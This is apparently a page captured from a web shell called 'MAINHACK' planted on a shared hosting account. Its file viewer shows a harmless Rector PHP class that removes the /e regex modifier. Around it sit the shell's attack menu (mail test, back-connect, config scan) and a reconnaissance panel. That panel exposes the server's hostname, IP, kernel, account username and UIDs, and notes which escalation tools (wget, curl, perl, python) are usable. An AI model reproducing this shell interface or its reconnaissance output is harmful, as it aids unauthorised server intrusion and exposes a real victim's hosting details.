[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: RegexMatcher.php
File is not writable. Editing disabled.
<?php declare (strict_types=1); namespace Rector\Php55; use RectorPrefix202411\Nette\Utils\Strings; use PhpParser\Node\Expr; use PhpParser\Node\Expr\BinaryOp\Concat; use PhpParser\Node\Scalar\String_; final class RegexMatcher { /** * @var string * @see https://regex101.com/r/Ok4wuE/1 */ private const LAST_E_REGEX = '#(\\w+)?e(\\w+)?$#'; /** * @var string * @see https://regex101.com/r/2NWVwT/1 */ private const LETTER_SUFFIX_REGEX = '#(?<modifiers>\\w+)$#'; /** * @var string[] * @see https://www.php.net/manual/en/reference.pcre.pattern.modifiers.php */ private const ALL_MODIFIERS_VALUES = ['i', 'm', 's', 'x', 'e', 'A', 'D', 'S', 'U', 'X', 'J', 'u']; /** * @return \PhpParser\Node\Expr\BinaryOp\Concat|\PhpParser\Node\Scalar\String_|null */ public function resolvePatternExpressionWithoutEIfFound(Expr $expr) { if ($expr instanceof String_) { $pattern = $expr->value; $delimiter = $pattern[0]; switch ($delimiter) { case '(': $delimiter = ')'; break; case '{': $delimiter = '}'; break; case '[': $delimiter = ']'; break; case '<': $delimiter = '>'; break; default: $delimiter = $delimiter; break; } /** @var string $modifiers */ $modifiers = $this->resolveModifiers((string) Strings::after($pattern, $delimiter, -1)); if (\strpos($modifiers, 'e') === \false) { return null; } $expr->value = $this->createPatternWithoutE($pattern, $delimiter, $modifiers); return $expr; } if ($expr instanceof Concat) { return $this->matchConcat($expr); } return null; } private function resolveModifiers(string $modifiersCandidate) : string { $modifiers = ''; for ($modifierIndex = 0; $modifierIndex < \strlen($modifiersCandidate); ++$modifierIndex) { if (!\in_array($modifiersCandidate[$modifierIndex], self::ALL_MODIFIERS_VALUES, \true)) { $modifiers = ''; continue; } $modifiers .= $modifiersCandidate[$modifierIndex]; } return $modifiers; } private function createPatternWithoutE(string $pattern, string $delimiter, string $modifiers) : string { $modifiersWithoutE = \str_replace('e', '', $modifiers); return Strings::before($pattern, $delimiter, -1) . $delimiter . $modifiersWithoutE; } private function matchConcat(Concat $concat) : ?Concat { // cause parse error if (!$concat->left instanceof Concat) { return null; } $lastItem = $concat->right; if (!$lastItem instanceof String_) { return null; } $matches = Strings::match($lastItem->value, self::LETTER_SUFFIX_REGEX); if (!isset($matches['modifiers'])) { return null; } if (\strpos((string) $matches['modifiers'], 'e') === \false) { return null; } // replace last "e" in the code $lastItem->value = Strings::replace($lastItem->value, self::LAST_E_REGEX, '$1$2'); return $concat; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium264.web-hosting.com
Server IP: 69.57.162.13
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 73.56 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: kidscntx
User ID (UID): 1154
Group ID (GID): 1112
Script Owner UID: 1154
Current Dir Owner: N/A